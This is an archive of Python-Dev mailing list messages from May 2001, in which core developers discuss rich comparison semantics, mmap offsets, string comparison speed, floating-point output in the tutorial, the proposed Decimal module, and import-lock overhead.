Date: Mon, 21 May 2001 03:53:24 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com>

[Guido]
> I would like to break this down by defining the mapping between cmp()
> and rich comparisons.

Good idea!

> I propose:
>
> - If cmp() is requested but not defined, and rich comparisons are
>   defined, try ==, <, > in order; if all three yield false, act as if
>   rich comparisons were not defined, and use the fallback comparison
>   (i.e. by address).

Here and below didn't cover the case where cmp() is requested and is defined.
I believe it's agreed now (but wasn't yet at the time you wrote this) that
cmp() will be called in that case (and which requires changes to the current
implementation).
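Read literally, the first bullet of the proposal amounts to something like the following Python sketch. The name `cmp_from_rich` is hypothetical, the sketch assumes the rich comparisons exist and return truth values, and `id()` stands in for the address-based fallback.

```python
def cmp_from_rich(a, b):
    """3-way cmp built from rich comparisons, per the proposal (sketch)."""
    # Try ==, <, > in that order.
    if a == b:
        return 0
    if a < b:
        return -1
    if a > b:
        return 1
    # All three were false: act as if rich comparisons were not defined
    # and fall back to comparing addresses (id() plays that role here).
    return (id(a) > id(b)) - (id(a) < id(b))
```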

> - If a rich comparison is requested but not defined, use cmp() and use
>   the obvious mapping.

Cool, except this is missing what I believe was intended detail, like that
when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be
tried before falling back to cmp().  Also note this today:

class C:
    def __lt__(x, y):
        print "in __lt__"
        return NotImplemented

    def __gt__(x, y):
        print "in __gt__"
        return NotImplemented

C() < C()

That prints

in __lt__
in __gt__
in __gt__
in __lt__

I don't know how to explain why each method gets called twice (well, I do, but
it's hard to swallow <wink>).  Again this can have semantic consequences,
e.g. if the methods have side-effects; and it's unclear whether this is
intended, a bug, or implementation-defined.
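For contrast, here is a sketch of the lookup order described above for `x < y`, in which each method is tried at most once: `x.__lt__(y)`, then the reflected `y.__gt__(x)`, then a 3-way fallback. `rich_lt` and its `fallback_cmp` parameter are hypothetical stand-ins (the latter for `cmp()`), not CPython internals.

```python
def rich_lt(x, y, fallback_cmp):
    """Evaluate x < y: x.__lt__, then reflected y.__gt__, then 3-way cmp."""
    # Look the methods up on the types, as the interpreter does.
    lt = getattr(type(x), "__lt__", None)
    if lt is not None:
        result = lt(x, y)
        if result is not NotImplemented:
            return result
    gt = getattr(type(y), "__gt__", None)
    if gt is not None:
        result = gt(y, x)
        if result is not NotImplemented:
            return result
    # Neither side handled it: fall back to the 3-way comparison.
    return fallback_cmp(x, y) < 0
```

With the class `C` above, this order would print "in __lt__" and "in __gt__" once each before reaching the fallback.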

> - Continue to define the comparison of unequal sequences in terms of
>   cmp().

"the comparison" is ambiguous there:  you mean all comparisons?  just cmp()
comparisons?  just rich comparisons?

In any case, it's also unclear what "in terms of cmp()" means:  that every pair of
corresponding elements must be compared via cmp()?  Or that only the first
non-Py_EQ pair must be compared via cmp()?  Pseudo-code would be much clearer
than English here.

> - Testing == or != for sequences takes these shortcuts:

Must take these shortcuts, or may take these shortcuts?

>   1. if the lengths differ, the sequences differ

Note that I removed the tuple_richcompare code for doing this, because I
never found a case where tuples were compared via Py_EQ/Py_NE and the lengths
differed.  So the length-check in this case was a waste of time.  It isn't
true of lists or strings that it's a waste of time, but I believe there are
strong reasons for why programs simply will not compare different-sized
tuples for equality.  I would not like to pay for tuple length checks if only
one case in 500 billion would benefit, but if #1 is a mandatory shortcut
there's no choice.

>   2. compare the elements using == until a false return is found

Currently the sequence rich-compare code does #2 for all 6 comparison
operators.  Is that wrong?  Looked reasonable to me!
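Since pseudo-code was requested, here is one reading of the two shortcuts as a Python sketch. `seq_richcompare` and its string operator codes are hypothetical; the length check for `==`/`!=` is written as the optional shortcut in question, and the ordering operators fall through to the first differing pair or, failing that, to the lengths.

```python
import operator

# Hypothetical operator codes mapped to the corresponding tests.
_OPS = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
        "!=": operator.ne, ">": operator.gt, ">=": operator.ge}


def seq_richcompare(v, w, op):
    """Rich comparison of sequences v and w for operator code op (sketch)."""
    # Shortcut 1 (optional): different lengths can never be equal.
    if op in ("==", "!=") and len(v) != len(w):
        return op == "!="
    # Shortcut 2: compare items with == until a false result turns up.
    n = min(len(v), len(w))
    i = 0
    while i < n and v[i] == w[i]:
        i += 1
    if i == n:
        # Common prefix is all equal: the lengths decide.
        return _OPS[op](len(v), len(w))
    # Items differ at index i: == and != are settled already ...
    if op == "==":
        return False
    if op == "!=":
        return True
    # ... and the ordering ops apply op to that first differing pair.
    return _OPS[op](v[i], w[i])
```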

> Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
> easily go the extra mile and define != to use only != on the items;
> but is this worth the extra complexity?

Not at all:  tuples and lists are Python's sequence types, so Python is
entitled to define what comparison means for them in any way it likes.  We've
already got cases where (see the first msg in this thread)

    [x] cmpop [y]

may yield a different result than

    x cmpop y

so we've already punted on doing the best-possible job of mimicking whatever
crazy-ass comparisons user-defined objects implement, when those objects are
contained in Python sequences.
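A concrete instance of that divergence from much later CPython (not behavior discussed in this thread): container comparisons treat identical items as equal before calling `__eq__`, so a NaN compares unequal to itself bare but equal inside a list. The helper name is hypothetical.

```python
def bare_vs_contained(x):
    """Return (x == x, [x] == [x]) to contrast bare and contained equality."""
    return x == x, [x] == [x]


nan = float("nan")
print(bare_vs_contained(nan))  # (False, True) in CPython
```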

My bias is showing <wink>:  I want Python's builtin sequence types to be as
efficient as possible.

Nasty example:  two conformable (same rank and dimensions) NumPy matrices A
and B return a conformable matrix of 0/1 bits when compared via "<" (well,
maybe they actually don't, but that's what drove richcmps to begin with!).
It may well be *convenient* for them if

    (A1, A2, A3) < (B1, B2, B3)

always returned a list (or tuple) of 3 0/1 matrices too:

    [A1 < B1, A2 < B2, A3 < B3]

So builtin sequence comparisons can't be all things to all people regardless.


From Barrett@stsci.edu  Mon May 21 13:17:09 2001
From: Barrett@stsci.edu (Paul Barrett)
Date: Mon, 21 May 2001 08:17:09 -0400
Subject: [Python-Dev] mmap module
References: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>
Message-ID: <3B090745.5D70353E@STScI.Edu>

Tim Peters wrote:
> 
> [Paul Barrett]
> > In the CVS log of the mmapmodule.c, Tim Peters says:
> >
> > "The code really needs to be rethought from scratch (not by me, though
> > ...)."
> 
> That was in specific reference to the code I changed, in mmap_find_method.
> The difficulty is that mmap is great for "large files", but the code before
> my change used a C int for the starting offset and also for the return
> value; I boosted those to a C long, which covers 63 bits on 64-bit Linux
> boxes, but doesn't help 64-bit Windows at all (where a C long remains 4
> bytes).  The mmap_object struct uses size_t to declare the relevant members,
> which is possibly better still than C long, but may still leave platform
> capabilities out of reach for large files (e.g., "even Win95" *allows*
> specifying 64-bit offsets when creating a mapped file view).  C is a
> friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue()
> don't cater to the full range of C integral types anyway.  In other words,
> if this code is ever to reach its full potential, it "really needs to be
> rethought from scratch".

OK, thanks for the clarification.

> > The ability to have offsets into a file that are not multiples of the
> > system pagesize would also be nice.
> 
> It's OS-specific.  Python should grow warts to protect against it on the
> OSes that care.

Well, hopefully the OS-differences wouldn't prevent implementing a
more abstract interface.
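For what it's worth, later versions of the mmap module grew an `offset` argument that must be a multiple of `mmap.ALLOCATIONGRANULARITY`, and a non-aligned offset can be emulated on top of it. A sketch, assuming a regular readable file; `read_region` is a hypothetical helper, not part of the module:

```python
import mmap
import os


def read_region(path, offset, size):
    """Return up to `size` bytes of the file at `path`, starting at `offset`.

    mmap offsets must be multiples of mmap.ALLOCATIONGRANULARITY, so this
    maps from the aligned position at or below `offset` and slices off the
    leading bytes that were not asked for.
    """
    gran = mmap.ALLOCATIONGRANULARITY
    aligned = (offset // gran) * gran
    skip = offset - aligned
    with open(path, "rb") as f:
        file_size = os.fstat(f.fileno()).st_size
        if size <= 0 or offset >= file_size:
            return b""
        # Never map past end of file; mmap can refuse to do that.
        length = min(skip + size, file_size - aligned)
        with mmap.mmap(f.fileno(), length, access=mmap.ACCESS_READ,
                       offset=aligned) as m:
            return m[skip:skip + size]
```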

> > I'd be willing to submit a PEP on a new mmapmodule, once I know what
> > others would like.
> 
> Hard to say.  This has the potential to become Python's next thread
> subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
> you do write a PEP, I vote to say that we'll cover Windows and Linux (and
> maybe Mac OS X?) out of the box, but any other platform is at your own risk
> (it doesn't really help if somebody pops up volunteering to support a
> minority platform, because they eventually go away, their code stops
> working, and it never gets fixed -- so it's use-at-your-own-risk in reality
> regardless).

Yes, I agree.  Windows, Unix/Linux, and Mac OS X should be the
supported platforms.

My intention is not to make major changes to the Python interface, but
to fix bugs and to implement some additional features, such as a
non-pagesize file offset.  I'll try to get something written up in the
near future.

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From martin@loewis.home.cs.tu-berlin.de  Mon May 21 17:44:59 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 18:44:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de>

> This stuff all ties together.  A pointer-equality test in string_compare() is
> guaranteed to lose every time string_compare() gets called from
> lookdict_string().  Let's lose string_compare() entirely (in favor of a
> self-contained-- apart from memcmp() --string_richcompare).

Ok. I've now updated my patch on SF to remove string_compare, inline
everything into string_richcompare, add _PyString_Eq, and use that in
lookdict_string. Who would want to review and approve/reject this
patch?

Regards,
Martin


From martin@loewis.home.cs.tu-berlin.de  Mon May 21 18:03:59 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 19:03:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>

> Note that the usual way to write this is
> 
>  		if (c < 0 && PyErr_Occurred())
> 
> More work for my artificial "ab" < "cd" case but a net win in real life (when
> c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
> when c < 0 there's no way in the cmp protocol to use c's value alone to
> distinguish between "less than" and "error").

Ok. I've updated my tp_compare patch on SF to do so; it also
un-deprecates UserList.__cmp__.

> > Here, I get 3 function calls: f is string_compare, then
> > PyErr_Occurred, finally convert_3way_to_object, which converts
> > {-1,0,1} x Op -> {Py_True, Py_False}.
> 
> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

Any reason why PyThreadState_GET isn't used there?
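The `{-1,0,1} x Op` mapping quoted above can be sketched in Python as a table of tests against zero. `convert_3way` is a hypothetical name echoing `convert_3way_to_object`. Unlike the C code it ignores errors; in C that is the spot where `PyErr_Occurred()` must be consulted when c < 0, since -1 doubles as the error signal.

```python
import operator

# A 3-way result c means: c < 0 "less", c == 0 "equal", c > 0 "greater".
# Each rich-comparison op then reduces to comparing c against zero.
_FROM_3WAY = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
              "!=": operator.ne, ">": operator.gt, ">=": operator.ge}


def convert_3way(c, op):
    """Map a 3-way result c and an operator code op to a bool (sketch)."""
    return _FROM_3WAY[op](c, 0)
```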

> There's no danger of over-indexing when ob_size==0, because it doesn't
> include the trailing null byte Python always sticks at the end of string
> objects; and the first-byte check is much more likely to pay off than the
> zero-length check (comparison to a null string?  gotta be rare as clear
> conclusions <wink>), and better to test for the more common case first.

This is now also in the string_richcompare patch on SF.
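The check ordering described above, sketched in Python over `bytes` (the helper `bytes_eq` is hypothetical; the real code is C). Slicing with `a[:1]` plays the role of the trailing null byte: it is safe on an empty string, so no separate zero-length test is needed before the first-byte check.

```python
def bytes_eq(a: bytes, b: bytes) -> bool:
    """Equality with the cheap rejections first (sketch of the C fast path)."""
    # Different sizes can never be equal.
    if len(a) != len(b):
        return False
    # First-byte check: pays off far more often than a zero-length test.
    # a[:1] is safe even when the length is 0, much as the C code can
    # safely read the trailing null byte of an empty string.
    if a[:1] != b[:1]:
        return False
    # Stand-in for memcmp() over the whole buffer.
    return a == b
```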

Regards,
Martin


From tim.one@home.com  Mon May 21 19:29:02 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 21 May 2001 14:29:02 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com>

[Fred checkin]
> > ***************
> > *** 2610,2617 ****
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200*200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.4, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]
> > --- 2610,2617 ----
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200 * 200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.400000000000002, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]

[Guido]
> Hmm...  The tutorial now contains at least one example of floating
> point imprecision.  Does it also contain text to explain this?  (I'm
> sure Tim would be happy to provide some if there isn't any. :-)

[Fred]
> It contains others, and I don't think there's an explanation.  Some
> text from Tim to explain this would be greatly appreciated!

Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
so long as we rely on the platform C to format floats, the output isn't
well-defined (the last digit or so can and will vary across boxes).

I can certainly explain that this is so, and even why, but unsure the
tutorial is the right place for it.  In any case the tutorial shouldn't be
giving examples whose output is platform-dependent.  For example, don't use
10 * 3.14, use 10 * 3.25.  Want me to scour the tutorial for all such cases?
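Why 10 * 3.25 is a safe choice can be checked exactly with the `fractions` module (a later addition to the standard library): 3.25 and 32.5 are both binary fractions, so the product is exact, while 3.14 and 31.4 are not. `is_exact` is a hypothetical helper.

```python
from fractions import Fraction


def is_exact(x, num, den):
    """True if float x is exactly num/den (Fraction(float) converts exactly)."""
    return Fraction(x) == Fraction(num, den)


print(is_exact(10 * 3.25, 65, 2))   # True: 32.5 is a binary fraction
print(is_exact(10 * 3.14, 157, 5))  # False: 31.4 has no exact binary form
```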

Or we could put the attached function at the start of the tutorial and use it
to format floats:

>>> f2ds(10 * 3.14)
'31400000000000002131628207280300557613372802734375e-48'
>>>

I'm sure newbies would feel assured by that <wink>.


def f2ds(x):
    """Return float x as exact decimal string.

    The string is of the form:
        "-", if and only if x is < 0.
        One or more decimal digits.  The last digit is not 0 unless x is 0.
        "e"
        The exponent, a (possibly signed) integer
    """

    import math
    # XXX ignoring infinities and NaNs for now.

    if x == 0:
        return "0e0"

    sign = ""
    if x < 0:
        sign = "-"
        x = -x

    f, e = math.frexp(x)
    assert 0.5 <= f < 1.0
    # x = f * 2**e exactly

    # Suck up CHUNK bits at a time; 28 is enough so that we suck
    # up all bits in 2 iterations for all known binary double-
    # precision formats, and small enough to fit in an int.
    CHUNK = 28
    top = 0L
    # invariant: x = (top + f) * 2**e exactly
    while f:
        f = math.ldexp(f, CHUNK)
        digit = int(f)
        assert digit >> CHUNK == 0
        top = (top << CHUNK) | digit
        f -= digit
        assert 0.0 <= f < 1.0
        e -= CHUNK
    assert top > 0

    # Now x = top * 2**e exactly.  Get rid of trailing 0 bits if e < 0
    # (purely to increase efficiency a little later -- this loop can
    # be removed without changing the result).
    while e < 0 and top & 1 == 0:
        top >>= 1
        e += 1

    # Transform this into an equal value top' * 10**e'.
    if e > 0:
        top <<= e
        e = 0
    elif e < 0:
        # Exact is top/2**-e.  Multiply top and bottom by 5**-e to
        # get top*5**-e/10**-e = top*5**-e * 10**e
        top *= 5L**-e

    # Nuke trailing (decimal) zeroes.
    while 1:
        assert top > 0
        newtop, rem = divmod(top, 10L)
        if rem:
            break
        top = newtop
        e += 1

    return "%s%de%d" % (sign, top, e)
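In later Pythons the same exact expansion is available without hand-rolled bignum code, because `decimal.Decimal(float)` converts exactly. A sketch (`exact_decimal` is a hypothetical name); for 10 * 3.14 it should print the digits f2ds produces, with a decimal point in place of the exponent:

```python
from decimal import Decimal


def exact_decimal(x):
    """Exact decimal expansion of float x via Decimal's exact conversion."""
    return str(Decimal(x))


print(exact_decimal(10 * 3.14))
```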


From guido@digicool.com  Mon May 21 20:02:43 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 15:02:43 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT."
 <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com>
Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com>

> Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
> so long as we rely on the platform C to format floats, the output isn't
> well-defined (the last digit or so can and will vary across boxes).

I can't check right now, but I thought that this was pretty consistent
across some common platforms?

> I can certainly explain that this is so, and even why, but unsure
> the tutorial is the right place for it.  In any case the tutorial
> shouldn't be giving examples whose output is platform-dependent.
> For example, don't use 10 * 3.14, use 10 * 3.25.  Want me to scour
> the tutorial for all such cases?

Are you serious?

This is something that any newbie who is in the least bit adventurous
will run into anyway, so I don't think that not talking about this at
all in the tutorial is fair or helpful.  That just perpetuates the
questions from newbies about "floating point is broken" -- since none
of the tutorial examples prepare them for this.

Since this is behavior that is ordinarily observed and perpetually
perplexing, I think it *must* be treated in the tutorial.  The
tutorial doesn't have to have the full explanation -- maybe it's
enough to say something like ``due to round-off errors you will
sometimes see inexact results like 31.400000000000002; don't worry
about this, you can use str() or "%g" (but not round()!) to strip
redundant precision, and here's a URL for more info.''

Or maybe the full story can be an appendix.
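A sketch of the stripping advice under modern Python 3, where one detail has changed since this thread: `str()` of a float now equals `repr()`, so it no longer hides the extra digits, while `"%g"`-style formatting still does. `tidy` is a hypothetical helper:

```python
def tidy(x, digits=12):
    """Format float x with at most `digits` significant digits ("%g" style)."""
    return "%.*g" % (digits, x)


x = 10 * 3.14
print(repr(x))   # 31.400000000000002
print("%g" % x)  # 31.4
print(tidy(x))   # 31.4
```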

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz@rahul.net  Mon May 21 21:09:04 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:09:04 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM
Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
> Or maybe the full story can be an appendix.

Or maybe Decimal should go in the standard distribution?  What kind of
deadline do I have for finishing that to go into 2.2?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido@digicool.com  Mon May 21 21:35:10 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:35:10 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT."
 <20010521200904.05CAE99C81@waltz.rahul.net>
References: <20010521200904.05CAE99C81@waltz.rahul.net>
Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com>

> > Or maybe the full story can be an appendix.
> 
> Or maybe Decimal should go in the standard distribution?  What kind of
> deadline do I have for finishing that to go into 2.2?

Adding Decimal to the distribution is fine.  But using it by default
for floating point literals and other floating point results is a
different story.  The PEP about that hasn't really been discussed
enough to make a decision, but a conservative estimate is that this
change won't be made in 2.2.  So Decimal doesn't solve the problem the
tutorial has.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz@rahul.net  Mon May 21 21:42:15 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:42:15 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM
Message-ID: <20010521204215.F216699C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
>>> Or maybe the full story can be an appendix.
>> 
>> Or maybe Decimal should go in the standard distribution?  What kind of
>> deadline do I have for finishing that to go into 2.2?
> 
> Adding Decimal to the distribution is fine.  But using it by default
> for floating point literals and other floating point results is a
> different story.  The PEP about that hasn't really been discussed
> enough to make a decision, but a conservative estimate is that this
> change won't be made in 2.2.  So Decimal doesn't solve the problem the
> tutorial has.

Wasn't thinking of going quite that far, only changing the tutorial to
say something like, "If you want speed, use the hardware FP (which is
directly supported by Python's floating literals); if you want accuracy,
use Decimal."  (Or FixedPoint, which is already in the distribution.)
The full story needn't go in the Appendix; we can simply refer people to
Cowlishaw and Kahan.


From guido@digicool.com  Mon May 21 21:57:08 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:57:08 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT."
 <20010521204215.F216699C81@waltz.rahul.net>
References: <20010521204215.F216699C81@waltz.rahul.net>
Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com>

[Aahz]
> >>> Or maybe the full story can be an appendix.
> >> 
> >> Or maybe Decimal should go in the standard distribution?  What kind of
> >> deadline do I have for finishing that to go into 2.2?

[Guido]
> > Adding Decimal to the distribution is fine.  But using it by default
> > for floating point literals and other floating point results is a
> > different story.  The PEP about that hasn't really been discussed
> > enough to make a decision, but a conservative estimate is that this
> > change won't be made in 2.2.  So Decimal doesn't solve the problem the
> > tutorial has.

[Aahz]
> Wasn't thinking of going quite that far, only changing the tutorial to
> say something like, "If you want speed, use the hardware FP (which is
> directly supported by Python's floating literals); if you want accuracy,
> use Decimal."  (Or FixedPoint, which is already in the distribution.)
> The full story needn't go in the Appendix; we can simply refer people to
> Cowlishaw and Kahan.

I think that most people don't care about either speed or accuracy,
but (being Python users) everybody cares about convenience, and
convenience is using the built-in floating point literals.  (Also,
most other modules returning or using floating point numbers use
binary floating point, e.g. the time module and of course the math
module.)

As long as the built-in literals are binary floating point, they are
what 99% of the code uses, so we need to explain the pitfalls.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake@cj42289-a.reston1.va.home.com  Mon May 21 22:47:35 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Mon, 21 May 2001 17:47:35 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental updates to the Python 2.2 documentation.


From tim@digicool.com  Mon May 21 22:57:22 2001
From: tim@digicool.com (Tim Peters)
Date: Mon, 21 May 2001 17:57:22 -0400
Subject: [Python-Dev] FP vs. tutorial
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>

Let's get some errors cleared up first:

+ FixedPoint is not in the distribution.

+ There is no PEP for Decimal.

+ Decimal f.p. is not more accurate than binary f.p.  In fact, it's
  provably worse (but not by much).
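A small illustration of that last point using the `decimal` module that later joined the standard library (not Aahz's package under discussion): decimal arithmetic rounds too, and (1/3)*3 misses 1 at 28 digits, even though the same expression happens to round back to exactly 1.0 with binary doubles. The helper name is hypothetical.

```python
from decimal import Decimal, localcontext


def third_times_three(prec=28):
    """Compute (1/3)*3 in decimal arithmetic at the given precision."""
    with localcontext() as ctx:
        ctx.prec = prec
        return Decimal(1) / Decimal(3) * 3


print(third_times_three())  # 0.9999999999999999999999999999
print((1 / 3) * 3 == 1.0)   # True with IEEE-754 doubles
```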

For the rest,

+ Yes, I'm serious about not including tutorial examples with
  platform-dependent output, unless they're explicitly meant to
  illustrate non-portable code.

+ Specific small examples notwithstanding, there is no uniformity
  across platforms in the last digit or so, because not even the IEEE-
  754 standard requires that (while C is much sloppier than 754), and
  vendors generally don't implement anything better than the minimum
  necessary when it comes to f.p. (Sun is a notable exception).

+ Happy to add text explaining the existence of surprises, and
  providing a URL.  Do the floating-point morons <wink> on Python-Dev
  find this one comprehensible?:

    http://www.lahey.com/float.htm


From guido@digicool.com  Mon May 21 23:33:17 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 18:33:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT."
 <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>
Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com>

> + Yes, I'm serious about not including tutorial examples with
>   platform-dependent output, unless they're explicitly meant to
>   illustrate non-portable code.

Sure.  Most examples can be rewritten to avoid platform-dependent
output.  But there should be one section on floating-point
inaccuracies that shows a few of the kind of things you can expect on
a typical platform, and 1.1 -> 1.1000000000000001 is pretty common.
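At the time, `repr()` printed 17 significant digits, which is where 1.1000000000000001 comes from; later Pythons print the shortest string that round-trips, so a tutorial example would need explicit formatting to show it today. A sketch (`show_digits` is hypothetical), assuming IEEE-754 doubles:

```python
def show_digits(x):
    """Return (shortest round-trip repr, 17-significant-digit form) of x."""
    return repr(x), "%.17g" % x


print(show_digits(1.1))  # ('1.1', '1.1000000000000001')
```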

> + Specific small examples notwithstanding, there is no uniformity
>   across platforms in the last digit or so, because not even the IEEE-
>   754 standard requires that (while C is much sloppier than 754), and
>   vendors generally don't implement anything better than the minimum
>   necessary when it comes to f.p. (Sun is a notable exception).

So we'll have to add something like "the actual inexact output you see
may differ from the inexact output in this example".

> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I was thinking more of immortalizing this one:

http://www.python.org/cgi-bin/moinmoin/RepresentationError

This can serve as a nice self-contained section on f.p. surprises.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From MarkH@ActiveState.com  Tue May 22 00:06:39 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:06:39 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>

> > + Happy to add text explaining the existence of surprises, and
> >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> >   find this one comprehensible?:

Hey - I resemble that remark!

> >     http://www.lahey.com/float.htm

I quite liked the tone of this note.  The Python-dev morons probably could
make good sense of this, but only due to the relentless persistence of a
certain timbot.

If not for Tim, I would have forgotten completely about binary floating
point versus decimal floating point.  IIRC, me and about 40 other guys were
desperately trying to get the attention of the single CS female on the day
that lecture was given.  (Actually, that is a pretty safe bet - _all_
lectures were spent that way :)

However, without a little additional background I doubt the masses would be
able to get too far into this.

As Tim has said a few times, most people won't care - they just want it to
work!

> I was thinking more of immortalizing this one:
>
> http://www.python.org/cgi-bin/moinmoin/RepresentationError

IMO, this is a little worse.  There is less "background".  Eg, in almost the
first paragraph we see:

"""
Rewriting
    1        J
   ---  ~= ----
   10      2**N
"""

And I went "huh?  Where did J and N spring from?".  Reading a bit further
made it clear, but this document did seem a little impenetrable to floating
point or maths newbies.

It seems to me that the RepresentationError document was written for people
with a decent background in maths - exactly the sort of people who _don't_
need such a document.
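For the record, J and N in that formula come from requiring J to have exactly 53 bits, the precision of an IEEE-754 double; for 1/10 that forces N = 56. A sketch of the computation with integer arithmetic and `fractions` (the helper name is hypothetical):

```python
from fractions import Fraction


def best_j(n):
    """Integer J closest to 2**n / 10, so that J / 2**n approximates 1/10."""
    q, r = divmod(2 ** n, 10)
    return q + 1 if 2 * r >= 10 else q  # round to nearest


J = best_j(56)
print(J)                                      # 7205759403792794
print(2 ** 52 <= J < 2 ** 53)                 # True: exactly 53 bits
print(Fraction(0.1) == Fraction(J, 2 ** 56))  # True: this is the stored 0.1
```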

Just-my-0.020000002-cents-worth ly,

Mark.


From jeremy@digicool.com  Tue May 22 00:13:09 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Mon, 21 May 2001 19:13:09 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
References: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <15113.41221.839653.822246@slothrop.digicool.com>

We looked at the SecondImport test case today.  It's a good test case
for programs that execute "import os" in a time-critical inner loop
:-).

The primary reason it is slower is the import lock that was added
after 1.5.2.  The benchmark, run in isolation, spends about 6 percent
of its time in the locking code.  Since it only spends about 20
percent of its time actually doing imports, this is a pretty
substantial cost.

It seems possible to eliminate some of the cost by using a special
marker in sys.modules that means: "This is not a module, but it's
being loaded by another thread."  But Guido doesn't sound interested
in optimizing programs with imports in inner loops.
